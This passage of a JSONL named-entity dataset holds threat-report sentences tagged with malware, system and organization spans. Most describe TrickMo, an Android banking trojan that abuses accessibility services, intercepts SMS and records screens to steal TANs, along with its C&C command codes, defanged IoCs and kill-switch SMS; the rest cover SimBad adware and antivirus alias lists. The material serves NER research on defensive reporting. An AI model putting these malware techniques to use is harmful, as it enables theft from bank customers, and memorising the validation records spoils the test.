that about 60 % of Android users are still sitting with Android 4.4.2 and below .", "spans": {"System: Android": [[43, 50]], "System: Android 4.4.2 and below": [[80, 103]]}, "info": {"id": "cyner_valid_000659", "source": "cyner_valid"}} {"text": "Better not to take any chances at all , no matter which version of the OS you use .", "spans": {}, "info": {"id": "cyner_valid_000661", "source": "cyner_valid"}} {"text": "So we recommend installing an anti-virus solution on your Android device .", "spans": {}, "info": {"id": "cyner_valid_000662", "source": "cyner_valid"}} {"text": "Just don ’ t forget that the scan does not run automatically in the free version .", "spans": {}, "info": {"id": "cyner_valid_000664", "source": "cyner_valid"}} {"text": "But all in all Triada is yet another example of a really bad trend : malware developers are taking Android seriously , and the latest samples are almost as complex and hard to withstand , as their Windows-based kin .", "spans": {"Malware: Triada": [[15, 21]], "System: Android": [[99, 106]], "System: Windows-based": [[197, 210]]}, "info": {"id": "cyner_valid_000665", "source": "cyner_valid"}} {"text": "The only good way to fight all these threats is to be proactive , and so a good security solution is a must .", "spans": {}, "info": {"id": "cyner_valid_000666", "source": "cyner_valid"}} {"text": "TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany March 24 , 2020 IBM X-Force researchers analyzed an Android malware app that ’ s likely being pushed to infected users by the TrickBot Trojan .", "spans": {"Malware: TrickBot": [[0, 8], [189, 197]], "Organization: IBM X-Force": [[79, 90]], "System: Android": [[115, 122]]}, "info": {"id": "cyner_valid_000667", "source": "cyner_valid"}} {"text": "While it ’ s not the first of its kind , this Android malware app is more sophisticated than similar apps and possesses interesting features that enable its operators to steal transaction authorization codes from victims who download 
the app .", "spans": {"System: Android": [[46, 53]]}, "info": {"id": "cyner_valid_000669", "source": "cyner_valid"}} {"text": "According to our research , TrickMo is still under active development as we expect to see frequent changes and updates .", "spans": {"Malware: TrickMo": [[28, 35]]}, "info": {"id": "cyner_valid_000670", "source": "cyner_valid"}} {"text": "While it can be used anywhere and target any bank or region , at this time , we are seeing it deployed specifically in Germany .", "spans": {}, "info": {"id": "cyner_valid_000671", "source": "cyner_valid"}} {"text": "In 2020 , it appears that TrickBot ’ s vast bank fraud is an ongoing project that helps the gang monetize compromised accounts .", "spans": {"Malware: TrickBot": [[26, 34]]}, "info": {"id": "cyner_valid_000673", "source": "cyner_valid"}} {"text": "First Signs in September 2019 In September 2019 , a tweet by CERT-Bund caught the attention of the IBM Trusteer Mobile Security Research team .", "spans": {"Organization: CERT-Bund": [[61, 70]], "Organization: IBM Trusteer Mobile Security Research": [[99, 136]]}, "info": {"id": "cyner_valid_000674", "source": "cyner_valid"}} {"text": "The tweet stated that TrickBot , a well-known banking Trojan owned by an organized cybercrime gang , uses man-in-the-browser ( MITB ) web injects in online banking sessions to ask infected users for their mobile phone number and device type .", "spans": {"Malware: TrickBot": [[22, 30]]}, "info": {"id": "cyner_valid_000675", "source": "cyner_valid"}} {"text": "Machine translation of this tweet reads : “ Watch out for online banking : Emotet reloads TrickBot .", "spans": {"Malware: Emotet": [[75, 81]], "Malware: TrickBot": [[90, 98]]}, "info": {"id": "cyner_valid_000676", "source": "cyner_valid"}} {"text": "On infected PCs , TrickBot displays a query for the mobile phone number and the device type used for banking and then prompts users to install an alleged security app. 
” When banking Trojans ask for this type of information , it usually means the next step will be an attempt to infect the victim ’ s mobile device .", "spans": {"Malware: TrickBot": [[18, 26]]}, "info": {"id": "cyner_valid_000677", "source": "cyner_valid"}} {"text": "Our team went ahead and hunted for samples of the app and analyzed it in our labs .", "spans": {}, "info": {"id": "cyner_valid_000678", "source": "cyner_valid"}} {"text": "In this analysis , we get into the capabilities of the new variant and what we found to be a “ kill switch ” that can eliminate the malware remotely from an infected device .", "spans": {}, "info": {"id": "cyner_valid_000679", "source": "cyner_valid"}} {"text": "Desktop Trojans and Their Mobile Component The process by which Trojans attempt to infect mobile devices is at least a decade old .", "spans": {}, "info": {"id": "cyner_valid_000680", "source": "cyner_valid"}} {"text": "Usually , when users are already infected with malware like TrickBot on their desktop , they will see a web injection asking for their mobile device operating system ( OS ) type and phone number .", "spans": {"Malware: TrickBot": [[60, 68]]}, "info": {"id": "cyner_valid_000681", "source": "cyner_valid"}} {"text": "Next , if they indicate that they use an Android-based device , the Trojan , impersonating their bank with web injections , fools the victim into installing a fake security app .", "spans": {"System: Android-based": [[41, 54]]}, "info": {"id": "cyner_valid_000682", "source": "cyner_valid"}} {"text": "Our research team analyzed the malicious Android application that is most likely being spread by TrickBot and dubbed it “ TrickMo. 
” Targeting users in Germany at this time , TrickMo is the latest variation in the transaction authentication number ( TAN ) -stealing malware category .", "spans": {"System: Android": [[41, 48]], "Malware: TrickBot": [[97, 105]], "Malware: TrickMo.": [[122, 130]], "Malware: TrickMo": [[175, 182]]}, "info": {"id": "cyner_valid_000684", "source": "cyner_valid"}} {"text": "Its main capabilities include : Stealing personal device information Intercepting SMS messages Recording targeted applications for one-time password ( TAN ) Lockdown of the phone Stealing pictures from the device Self-destruction and removal As banks release more advanced security measures , banking malware evolves to keep up with the perpetual arms race .", "spans": {}, "info": {"id": "cyner_valid_000685", "source": "cyner_valid"}} {"text": "From our analysis of the TrickMo mobile malware , it is apparent that TrickMo is designed to break the newest methods of OTP and , specifically , TAN codes often used in Germany .", "spans": {"Malware: TrickMo": [[25, 32], [70, 77]]}, "info": {"id": "cyner_valid_000686", "source": "cyner_valid"}} {"text": "Among the various features we discuss in this post , we believe that TrickMo ’ s most significant novelty is an app recording feature , which gives it the ability to overcome the newer pushTAN app validations used by German banks .", "spans": {"Malware: TrickMo": [[69, 76]]}, "info": {"id": "cyner_valid_000687", "source": "cyner_valid"}} {"text": "In the analysis that follows , we describe in detail the capabilities of this new variant and a “ kill switch ” that can remotely eliminate the malware from a mobile device .", "spans": {}, "info": {"id": "cyner_valid_000688", "source": "cyner_valid"}} {"text": "Why Do Desktop Trojans Use a Mobile Component ?", "spans": {}, "info": {"id": "cyner_valid_000689", "source": "cyner_valid"}} {"text": "About a decade ago , attackers wielding banking Trojans could simply use stolen credentials to access a victim ’ s online 
banking account and perform money transfers .", "spans": {}, "info": {"id": "cyner_valid_000690", "source": "cyner_valid"}} {"text": "As a countermeasure , financial institutions introduced various second factor authentication ( 2FA ) methods .", "spans": {}, "info": {"id": "cyner_valid_000691", "source": "cyner_valid"}} {"text": "One method , which was popular in Germany , is known as mobile TAN ( mTAN ) .", "spans": {}, "info": {"id": "cyner_valid_000692", "source": "cyner_valid"}} {"text": "It was implemented by sending an SMS message containing a one-time password ( OTP ) to the client ’ s mobile device .", "spans": {}, "info": {"id": "cyner_valid_000693", "source": "cyner_valid"}} {"text": "The transaction would only be authorized after the client enters the TAN into the online banking website in their browser .", "spans": {}, "info": {"id": "cyner_valid_000694", "source": "cyner_valid"}} {"text": "Keep in mind that while this case is about TANs , it can be any OTP , depending on which bank is being targeted .", "spans": {}, "info": {"id": "cyner_valid_000695", "source": "cyner_valid"}} {"text": "In some cases , sophisticated web injects were used to trick victims into entering their 2FA codes directly into the web forms controlled by the malware to eliminate the need for the mobile malware component .", "spans": {}, "info": {"id": "cyner_valid_000697", "source": "cyner_valid"}} {"text": "But attackers were still constantly looking for new methods to steal TANs .", "spans": {}, "info": {"id": "cyner_valid_000698", "source": "cyner_valid"}} {"text": "Around 2011 , the infamous Zeus Trojan started using web injects that tricked users into downloading a mobile component called “ ZitMo ” ( Zeus in the Mobile ) .", "spans": {"Malware: Zeus Trojan": [[27, 38]], "Malware: ZitMo": [[129, 134]], "Malware: Zeus": [[139, 143]]}, "info": {"id": "cyner_valid_000699", "source": "cyner_valid"}} {"text": "This was used to bypass 2FA methods by intercepting the SMS messages 
coming from the bank and stealing the mTANs without the victim ’ s knowledge .", "spans": {}, "info": {"id": "cyner_valid_000700", "source": "cyner_valid"}} {"text": "Many other banking malware families followed suit and released their own Android malware components designed to steal those OTPs and TANs .", "spans": {}, "info": {"id": "cyner_valid_000701", "source": "cyner_valid"}} {"text": "Instead of relying on SMS messages , which can be easily intercepted by third-party apps , these applications started using push notifications for users , containing the transaction details and the TAN .", "spans": {}, "info": {"id": "cyner_valid_000703", "source": "cyner_valid"}} {"text": "The pushTAN method has a clear advantage : It improves security by mitigating the risk of SIM swapping attacks and SMS stealers .", "spans": {}, "info": {"id": "cyner_valid_000704", "source": "cyner_valid"}} {"text": "TrickMo Calls pushTAN The pushTAN method is a hurdle for malware apps that may reside on the same device , and it ’ s particularly challenging for mobile malware due to Android ’ s application sandbox .", "spans": {"Malware: TrickMo": [[0, 7]], "System: Android": [[169, 176]]}, "info": {"id": "cyner_valid_000705", "source": "cyner_valid"}} {"text": "This feature is designed to block one application from accessing the data of other applications without rooting the device .", "spans": {}, "info": {"id": "cyner_valid_000706", "source": "cyner_valid"}} {"text": "To get around this challenge , TrickMo ’ s developers added some new features to steal TANs using screen video recording and screen data scraping .", "spans": {"Malware: TrickMo": [[31, 38]]}, "info": {"id": "cyner_valid_000707", "source": "cyner_valid"}} {"text": "The Root of All ( Android ) Evil So how does TrickMo get around these security features ?", "spans": {"System: Android": [[18, 25]], "Malware: TrickMo": [[45, 52]]}, "info": {"id": "cyner_valid_000708", "source": "cyner_valid"}} {"text": "It abuses accessibility 
services .", "spans": {}, "info": {"id": "cyner_valid_000709", "source": "cyner_valid"}} {"text": "Any app can ask for accessibility permissions and implement features such as screen reading , changing sizes and colors of objects , hearing enhancements , replacing touch with other forms of control and more .", "spans": {}, "info": {"id": "cyner_valid_000711", "source": "cyner_valid"}} {"text": "In recent years , some malicious Android applications abused these accessibility services in various attack scenarios .", "spans": {"System: Android": [[33, 40]]}, "info": {"id": "cyner_valid_000712", "source": "cyner_valid"}} {"text": "In the image below , we see the malware function that detects such dialogs when they are presented to the user , asking them to tap an option based on predefined choices .", "spans": {}, "info": {"id": "cyner_valid_000716", "source": "cyner_valid"}} {"text": "TrickMo ’ s Persistence Capabilities When it comes to Android-based devices , many applications must find a way to run on the device after a system reboot .", "spans": {"Malware: TrickMo": [[0, 7]], "System: Android-based": [[54, 67]]}, "info": {"id": "cyner_valid_000717", "source": "cyner_valid"}} {"text": "The most common way to achieve this is by creating a broadcast receiver that is registered to the “ android.intent.action.BOOT_COMPLETED ” broadcast action and adding code that boots the application when the broadcast is fired .", "spans": {}, "info": {"id": "cyner_valid_000718", "source": "cyner_valid"}} {"text": "Instead of running its service only at boot time , it registers a receiver that listens to the “ android.intent.action.SCREEN_ON ” and “ android.provider.Telephony.SMS_DELIVER ” broadcast actions .", "spans": {}, "info": {"id": "cyner_valid_000721", "source": "cyner_valid"}} {"text": "It then uses the AlarmManager to set a pending intent that will run its own service after a predefined interval .", "spans": {"System: AlarmManager": [[17, 29]]}, "info": {"id": 
"cyner_valid_000722", "source": "cyner_valid"}} {"text": "Tricky Configurations TrickMo uses the shared preferences mechanism to store settings and data that the malware uses at runtime .", "spans": {"Malware: TrickMo": [[22, 29]]}, "info": {"id": "cyner_valid_000724", "source": "cyner_valid"}} {"text": "Some of the settings are Boolean values that act as switches .", "spans": {}, "info": {"id": "cyner_valid_000725", "source": "cyner_valid"}} {"text": "They represent features and can be turned on and off from the command-and-control ( C & C ) server or by an SMS message , effectively instructing the malware to execute certain tasks .", "spans": {}, "info": {"id": "cyner_valid_000726", "source": "cyner_valid"}} {"text": "Some of the settings include : The URL of the C & C server Service wake-up intervals Important package names Accessibility permissions status Lockdown screen status Recording status SMS app status Kill switch status Stealth To keep its resources safer and make analysis more difficult for researchers , TrickMo uses an obfuscator to scramble the names of its functions , classes and variables .", "spans": {"Malware: TrickMo": [[303, 310]]}, "info": {"id": "cyner_valid_000727", "source": "cyner_valid"}} {"text": "As an example , in the two images below , we can see the encrypted and decrypted shared preferences file , which is encrypted using the java “ PBEWithMD5AndDES ” algorithm .", "spans": {}, "info": {"id": "cyner_valid_000729", "source": "cyner_valid"}} {"text": "C & C Communications Exfiltrating Device Data To communicate with its master , TrickMo ’ s code contains a hardcoded URL of the C & C server .", "spans": {"Malware: TrickMo": [[79, 86]]}, "info": {"id": "cyner_valid_000730", "source": "cyner_valid"}} {"text": "When it runs , it periodically connects to its designated server via an unencrypted HTTP request and sends over a JSON object that contains data gleaned from the victim ’ s phone .", "spans": {}, "info": {"id": 
"cyner_valid_000731", "source": "cyner_valid"}} {"text": "The stolen parameters follow : ID IMSI IMEI Phone number Operator AID Model Brand Version Build Battery percentage Wi-Fi connection state Wake time Are logs enabled ?", "spans": {}, "info": {"id": "cyner_valid_000732", "source": "cyner_valid"}} {"text": "Is the malware already set as the default SMS application ?", "spans": {}, "info": {"id": "cyner_valid_000733", "source": "cyner_valid"}} {"text": "[ True/False ] Signal strength Screen active [ True/False ] Orientation Was accessibility permission granted ?", "spans": {}, "info": {"id": "cyner_valid_000734", "source": "cyner_valid"}} {"text": "[ True/False ] Screen size List of the installed applications SMS messages saved on the device It is not uncommon for banking malware to harvest extensive amounts of data from the victim ’ s device .", "spans": {}, "info": {"id": "cyner_valid_000735", "source": "cyner_valid"}} {"text": "The collected data can then be used to generate a unique identifier of the bot or for monetization purposes .", "spans": {}, "info": {"id": "cyner_valid_000736", "source": "cyner_valid"}} {"text": "For example , since some banks use anti-fraud solutions that only check device fingerprinting , fraudsters can use the collected information to perform fraudulent transactions from a device that mimics that same fingerprint .", "spans": {}, "info": {"id": "cyner_valid_000738", "source": "cyner_valid"}} {"text": "Once in a while , it sends a packet to its C & C server containing the collected device data along with all the saved SMS messages .", "spans": {}, "info": {"id": "cyner_valid_000740", "source": "cyner_valid"}} {"text": "Since it can use the accessibility service to become the default SMS app , it can also delete the SMS messages so only the attackers can see them .", "spans": {}, "info": {"id": "cyner_valid_000741", "source": "cyner_valid"}} {"text": "A Communication Channel via Stolen SMS In addition , TrickMo has an automatic 
mechanism to send SMS messages to its C & C server .", "spans": {"Malware: TrickMo": [[53, 60]]}, "info": {"id": "cyner_valid_000743", "source": "cyner_valid"}} {"text": "It can save an SMS message on the device , marking with “ internal ” in the phone number field .", "spans": {}, "info": {"id": "cyner_valid_000745", "source": "cyner_valid"}} {"text": "The SMS message will be instantly sent to the server , informing the malware operator of executed tasks .", "spans": {}, "info": {"id": "cyner_valid_000746", "source": "cyner_valid"}} {"text": "In the image below , we see a log TrickMo sent to the attacker upon becoming the default SMS app .", "spans": {"Malware: TrickMo": [[34, 41]]}, "info": {"id": "cyner_valid_000747", "source": "cyner_valid"}} {"text": "If the malware successfully became the default SMS app , it sends the words “ the app has been replaced ” in Russian .", "spans": {}, "info": {"id": "cyner_valid_000748", "source": "cyner_valid"}} {"text": "If the original SMS app has been restored , it will send “ the app returned to its original place. 
” Controlling TrickMo TrickMo ’ s operators can control the malware via two channels : Through its C & C via a plaintext HTTP protocol using JSON objects Through encrypted SMS messages There are predefined commands to change the malware ’ s configuration and make it execute certain tasks .", "spans": {"Malware: TrickMo": [[113, 120], [121, 128]]}, "info": {"id": "cyner_valid_000749", "source": "cyner_valid"}} {"text": "Some of the more interesting commands include : SMS Control Update the address of the C & C server — SMS starting with “ http : // ” Send AES-encrypted SMS message back to sender — SMS starting with “ sms : // ” Update service wake-up interval — “ 2 ” Kill switch — “ 4 ” C & C Control Update the address of the C & C server — “ 1 ” Update service wake-up interval — “ 2 ” Lock the screen — “ 5 ” Display a picture in a WebView from an arbitrary URL — “ 11 ” Send an arbitrary SMS message — “ 8 ” Steal images", "spans": {}, "info": {"id": "cyner_valid_000750", "source": "cyner_valid"}} {"text": "saved on the device — “ 12 ” and “ 13 ” Use the accessibility service to become the default SMS app — “ 6 ” Enable recording of other apps — “ 15 ” Kill switch — “ 4 ” The Lockdown Screen Most thieves don ’ t want to be caught red-handed as they steal — they want to buy some time to get away with the loot .", "spans": {}, "info": {"id": "cyner_valid_000751", "source": "cyner_valid"}} {"text": "The same is true for banking malware .", "spans": {}, "info": {"id": "cyner_valid_000752", "source": "cyner_valid"}} {"text": "Desktop banking malware often blocks the user ’ s access to their banking website after a successful transaction by using web injects that show a variety of “ service unavailable ” screens .", "spans": {}, "info": {"id": "cyner_valid_000753", "source": "cyner_valid"}} {"text": "TrickMo is no different ; the goal is to complete the operation while raising minimal suspicion .", "spans": {"Malware: TrickMo": [[0, 7]]}, "info": {"id": 
"cyner_valid_000754", "source": "cyner_valid"}} {"text": "This background image likely contains a fake “ software update ” screen .", "spans": {}, "info": {"id": "cyner_valid_000757", "source": "cyner_valid"}} {"text": "This screen persists on the screen and prevents the user from using the navigation buttons .", "spans": {}, "info": {"id": "cyner_valid_000759", "source": "cyner_valid"}} {"text": "Due to TrickMo ’ s persistence implementation mentioned earlier , this lockdown screen persists after a restart and is re-initiated every time the device becomes interactive .", "spans": {"Malware: TrickMo": [[7, 14]]}, "info": {"id": "cyner_valid_000760", "source": "cyner_valid"}} {"text": "In some cases , TrickMo may use this feature to intercept SMS messages without the knowledge of the user by activating the lockdown screen and intercepting SMS messages in the background .", "spans": {"Malware: TrickMo": [[16, 23]]}, "info": {"id": "cyner_valid_000761", "source": "cyner_valid"}} {"text": "Application Recording — Stealing OTPs and TANs The feature that makes TrickMo different from standard SMS stealers is its unique ability to record the screen when targeted apps are running .", "spans": {"Malware: TrickMo": [[70, 77]]}, "info": {"id": "cyner_valid_000762", "source": "cyner_valid"}} {"text": "This feature was enabled only in newer versions of TrickMo that were tailored specifically for German banks and use a special application for implementing TAN-based 2FA .", "spans": {"Malware: TrickMo": [[51, 58]]}, "info": {"id": "cyner_valid_000763", "source": "cyner_valid"}} {"text": "The application recording is implemented via two methods : Using the Android MediaRecorder class to capture a video of the screen when the targeted application is presented to the user Using the accessibility service to save a text file containing the data of all the objects on the screen Both files are later sent to the C & C server of the attacker .", "spans": {"System: Android": [[69, 76]]}, 
"info": {"id": "cyner_valid_000764", "source": "cyner_valid"}} {"text": "In the following image , we can see how the malware receives a JSON object from the C & C server containing the command to start recording , the targeted apps and the recorded video size ratio .", "spans": {}, "info": {"id": "cyner_valid_000765", "source": "cyner_valid"}} {"text": "In the image below , the function recursively collects all the text data from the child nodes of each accessibility node .", "spans": {}, "info": {"id": "cyner_valid_000766", "source": "cyner_valid"}} {"text": "In other words , it goes through every object on the screen and saves its text data .", "spans": {}, "info": {"id": "cyner_valid_000767", "source": "cyner_valid"}} {"text": "A TrickMo Kill Switch One of the most interesting features of the TrickMo malware is having its own kill switch .", "spans": {"Malware: TrickMo": [[2, 9]], "Malware: TrickMo malware": [[66, 81]]}, "info": {"id": "cyner_valid_000768", "source": "cyner_valid"}} {"text": "Kill switches are used by many malware authors to remove traces from a device after a successful operation .", "spans": {}, "info": {"id": "cyner_valid_000769", "source": "cyner_valid"}} {"text": "In the following image , we can see the function that parses the commands from the C & C server .", "spans": {}, "info": {"id": "cyner_valid_000771", "source": "cyner_valid"}} {"text": "If the returned JSON object has the “ 4 ” key , it will turn on the kill switch and initiate its own removal by sending an intent and seamlessly confirming the uninstall using the accessibility service , all without the victim ever noticing anything .", "spans": {}, "info": {"id": "cyner_valid_000772", "source": "cyner_valid"}} {"text": "The kill switch can also be turned on by SMS .", "spans": {}, "info": {"id": "cyner_valid_000773", "source": "cyner_valid"}} {"text": "This is a bit more complicated since the SMS commands are encrypted and encoded with base64 .", "spans": {}, "info": {"id": 
"cyner_valid_000774", "source": "cyner_valid"}} {"text": "The encryption algorithm used is RSA , and interestingly , the authors chose to use the private key for decryption and leave it in the code as a hardcoded string .", "spans": {}, "info": {"id": "cyner_valid_000775", "source": "cyner_valid"}} {"text": "The image below shows the function that parses the SMS messages , decrypts them using the hardcoded RSA private key and executes the commands .", "spans": {}, "info": {"id": "cyner_valid_000776", "source": "cyner_valid"}} {"text": "Having analyzed a few variants of the malware , we noticed that the private key was exposed in the code and did not change .", "spans": {}, "info": {"id": "cyner_valid_000777", "source": "cyner_valid"}} {"text": "Therefore , our team managed to generate the public key and craft an SMS message that activated the kill switch .", "spans": {}, "info": {"id": "cyner_valid_000778", "source": "cyner_valid"}} {"text": "This means that the malware can be remotely eliminated by an SMS message .", "spans": {}, "info": {"id": "cyner_valid_000779", "source": "cyner_valid"}} {"text": "Our team was also able to test other commands in the lab either by tampering with the HTTP traffic from the C & C or by sending crafted SMS messages .", "spans": {}, "info": {"id": "cyner_valid_000780", "source": "cyner_valid"}} {"text": "Suspect You ’ re Infected ?", "spans": {}, "info": {"id": "cyner_valid_000781", "source": "cyner_valid"}} {"text": "The following SMS message can be used to kill the sample analyzed in this research and all other variants that use the same private key : HrLbpr3x/htAVnAgYepBuH2xmFDb68TYTt7FwGn0ddGlQJv/hqsctL57ocFU0Oz3L+uhLcOGG7GVBAfHKL1TBQ== Sending this SMS will trigger TrickMo ’ s kill switch by sending the string “ 4 ” encrypted with the generated RSA public key and base64", "spans": {"Malware: TrickMo": [[257, 264]]}, "info": {"id": "cyner_valid_000782", "source": "cyner_valid"}} {"text": "Indicators of Compromise ( IoCs ) hxxp : 
//mcsoft365.com/c hxxp : //pingconnect.net/c Hashes MD5 : 5c749c9fce8c41bf6bcc9bd8a691621b SHA256 : 284bd2d16092b4d13b6bc85d87950eb4c5e8cbba9af2a04d76d88da2f26c485c MD5 : b264af5d2f3390e465052ab502b0726d", "spans": {}, "info": {"id": "cyner_valid_000784", "source": "cyner_valid"}} {"text": "SHA256 : 8ab1712ce9ca2d7952ab763d8a4872aa6a278c3f60dc13e0aebe59f50e6e30f6 The TrickMo Factor The TrickBot Trojan was one of the most active banking malware strains in the cybercrime arena in 2019 .", "spans": {"Malware: TrickMo": [[78, 85]], "Malware: TrickBot Trojan": [[97, 112]]}, "info": {"id": "cyner_valid_000785", "source": "cyner_valid"}} {"text": "From our analysis , it is apparent that TrickMo is designed to help TrickBot break the most recent methods of TAN-based authentication .", "spans": {"Malware: TrickMo": [[40, 47]], "Malware: TrickBot": [[68, 76]]}, "info": {"id": "cyner_valid_000786", "source": "cyner_valid"}} {"text": "One of the most significant features TrickMo possesses is the app recording feature , which is what gives TrickBot the ability to overcome the newer pushTAN app validations deployed by banks .", "spans": {"Malware: TrickMo": [[37, 44]], "Malware: TrickBot": [[106, 114]]}, "info": {"id": "cyner_valid_000787", "source": "cyner_valid"}} {"text": "SimBad : A Rogue Adware Campaign On Google Play March 13 , 2019 Check Point researchers from the Mobile Threat Team have discovered a new adware campaign on the Google Play Store .", "spans": {"Malware: SimBad": [[0, 6]], "System: Google Play": [[36, 47]], "Organization: Check Point": [[64, 75]], "System: Google Play Store": [[161, 178]]}, "info": {"id": "cyner_valid_000788", "source": "cyner_valid"}} {"text": "This particular strain of Adware was found in 206 applications , and the combined download count has reached almost 150 million .", "spans": {}, "info": {"id": "cyner_valid_000789", "source": "cyner_valid"}} {"text": "Google was swiftly notified and removed the infected applications from the Google 
Play Store .", "spans": {"Organization: Google": [[0, 6]], "System: Google Play": [[75, 86]]}, "info": {"id": "cyner_valid_000790", "source": "cyner_valid"}} {"text": "Inside the SDK The malware resides within the ‘ RXDrioder ’ Software Development Kit ( SDK ) , which is provided by ‘ addroider [ .", "spans": {}, "info": {"id": "cyner_valid_000791", "source": "cyner_valid"}} {"text": "] com ’ as an ad-related SDK .", "spans": {}, "info": {"id": "cyner_valid_000792", "source": "cyner_valid"}} {"text": "We believe the developers were scammed to use this malicious SDK , unaware of its content , leading to the fact that this campaign was not targeting a specific county or developed by the same developer .", "spans": {}, "info": {"id": "cyner_valid_000793", "source": "cyner_valid"}} {"text": "The malware has been dubbed ‘ SimBad ’ due to the fact that a large portion of the infected applications are simulator games .", "spans": {"Malware: SimBad": [[30, 36]]}, "info": {"id": "cyner_valid_000794", "source": "cyner_valid"}} {"text": "After installation , the malware connects to the designated Command and Control ( C & C ) server , and receives a command to perform .", "spans": {}, "info": {"id": "cyner_valid_000796", "source": "cyner_valid"}} {"text": "‘ SimBad ’ comes with a respected list of capabilities on the user ’ s device , such as removing the icon from the launcher , thus making it harder for the user to uninstall , start to display background ads and open a browser with a given URL .", "spans": {"Malware: SimBad": [[2, 8]]}, "info": {"id": "cyner_valid_000797", "source": "cyner_valid"}} {"text": "What Does SimBad Do ?", "spans": {"Malware: SimBad": [[10, 16]]}, "info": {"id": "cyner_valid_000798", "source": "cyner_valid"}} {"text": "‘ SimBad ’ has capabilities that can be divided into three groups – Show Ads , Phishing , and Exposure to other applications .", "spans": {"Malware: SimBad": [[2, 8]]}, "info": {"id": "cyner_valid_000799", "source": "cyner_valid"}} 
{"text": "With the capability to open a given URL in a browser , the actor behind ‘ SimBad ’ can generate phishing pages for multiple platforms and open them in a browser , thus performing spear-phishing attacks on the user .", "spans": {"Malware: SimBad": [[74, 80]]}, "info": {"id": "cyner_valid_000800", "source": "cyner_valid"}} {"text": "With the capability to open market applications , such as Google Play and 9Apps , with a specific keyword search or even a single application ’ s page , the actor can gain exposure for other threat actors and increase his profits .", "spans": {"System: Google Play": [[58, 69]], "System: 9Apps": [[74, 79]]}, "info": {"id": "cyner_valid_000801", "source": "cyner_valid"}} {"text": "The actor can even take his malicious activities to the next level by installing a remote application from a designated server , thus allowing him to install new malware once it is required .", "spans": {}, "info": {"id": "cyner_valid_000802", "source": "cyner_valid"}} {"text": "The C & C server observed in this campaign is ‘ www [ .", "spans": {}, "info": {"id": "cyner_valid_000803", "source": "cyner_valid"}} {"text": "This server runs an instance of ‘ Parse Server ’ ( source on GitHub ) , an open source version of the Parse Backend infrastructure , which is a model for providing web app and mobile app developers with a way to link their applications to backend cloud storage and APIs exposed by back-end applications , while also providing features such as user management , push notifications and more .", "spans": {"Organization: GitHub": [[61, 67]]}, "info": {"id": "cyner_valid_000805", "source": "cyner_valid"}} {"text": "The domain ‘ addroider [ .", "spans": {}, "info": {"id": "cyner_valid_000806", "source": "cyner_valid"}} {"text": "] com ’ was registered via GoDaddy , and uses privacy protection service .", "spans": {"Organization: GoDaddy": [[27, 34]]}, "info": {"id": "cyner_valid_000807", "source": "cyner_valid"}} {"text": "While accessing the 
domain from a browser you get a login page very similar to other malware panels .", "spans": {}, "info": {"id": "cyner_valid_000808", "source": "cyner_valid"}} {"text": "The ‘ Register ’ and ‘ Sign Up ’ links are broken and ‘ redirects ’ the user back to the login page .", "spans": {}, "info": {"id": "cyner_valid_000809", "source": "cyner_valid"}} {"text": "According to RiskIQ ’ s PassiveTotal , the domain expired 7 months ago .", "spans": {"System: RiskIQ": [[13, 19]]}, "info": {"id": "cyner_valid_000810", "source": "cyner_valid"}} {"text": "As a result , it may be that are looking into a compromised , parked domain that was initially used legitimately , but is now participating in malicious activities .", "spans": {}, "info": {"id": "cyner_valid_000811", "source": "cyner_valid"}} {"text": "A backdoor also known as: W32.eHeur.Virus02 Win32.Trojan.WisdomEyes.16070401.9500.9999 Ransom.Locky.B Backdoor.Win32.Androm.ovjw Win32.Trojan.Dropper.Llhl Trojan.Tinba.Win32.4930 W32/Trojan.BWXR-8654 Trojan.Heur.GZ.ED1EB9A Trojan.Win32.Z.Tinba.58088 Backdoor.Win32.Androm.ovjw TrojanDownloader:Win32/Injranluder.A Win32/Tinba.CH Trojan.Win32.Tinba W32/Tinba.CH!tr Heur.Trojan.Hlux Trj/CI.A Win32/Trojan.Dropper.b73", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000001", "source": "cyner2_valid"}} {"text": "The Hancitor downloader has been relatively quiet since a major campaign back in June 2016.", "spans": {"Malware: The Hancitor downloader": [[0, 23]]}, "info": {"id": "cyner2_valid_000002", "source": "cyner2_valid"}} {"text": "PyCL/Fatboy ransomware indicators", "spans": {"Malware: PyCL/Fatboy ransomware": [[0, 22]]}, "info": {"id": "cyner2_valid_000003", "source": "cyner2_valid"}} {"text": "However, it has some other features that make it interesting.", "spans": {}, "info": {"id": "cyner2_valid_000004", "source": "cyner2_valid"}} {"text": "ClearSky conducts consistent monitoring of various Darknet actors and communities, including specific actors that 
develop and sell malware, exploits, bots and ransomware.", "spans": {"Organization: ClearSky": [[0, 8]], "Malware: malware, exploits, bots": [[131, 154]], "Malware: ransomware.": [[159, 170]]}, "info": {"id": "cyner2_valid_000005", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HW32.Packed.D1AE Win32.Worm.Harwig.D Worm/W32.Harwig.28672.B Worm.Harwig Win32.Worm.Harwig.D W32/Harwig.d Win32.Worm.Harwig.D Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Harwig.CCJK-3764 W32.Harwig Win.Trojan.Packed-85 Win32.Worm.Harwig.D IM-Worm.Win32.Harwig.d Win32.Worm.Harwig.D Trojan.Win32.Harwig.glxk Win32.Worm-im.Harwig.Ajlc Win32.Worm.Harwig.D TrojWare.Win32.PkdMorphine.~AN Win32.Worm.Harwig.D BackDoor.Oscar Worm.Harwig.Win32.4 BehavesLike.Win32.Pate.mc Worm.Win32.Harwig W32/Harwig.F Packed.Morphine.a Worm:Win32/Harwig.K Worm[IM]/Win32.Harwig Worm:Win32/Harwig.K W32.W.Harwig.d!c Trojan/Win32.Sdbot.C880385 IMWorm.Harwig W32/Harwig.G.worm W32/Harwig.BA!worm.im", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000006", "source": "cyner2_valid"}} {"text": "A backdoor also known as: OLE.Downloader.2522 TROJ_PHISHERLY.ZQEJ-A Doc.Tool.Phishery-6331699-0 W97M.DownLoader.1853 TROJ_PHISHERLY.ZQEJ-A ZIP/Trojan.DPBG-0 Trojan:O97M/Nocgrey.A Risk.Office.RemoteTemplate.a virus.office.script.4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000007", "source": "cyner2_valid"}} {"text": "We assess APT33 works at the behest of the Iranian government.", "spans": {"Organization: the Iranian government.": [[39, 62]]}, "info": {"id": "cyner2_valid_000008", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Android.Trojan.Geinimi.B AndroidOS/Geimini.B Android.F369B946 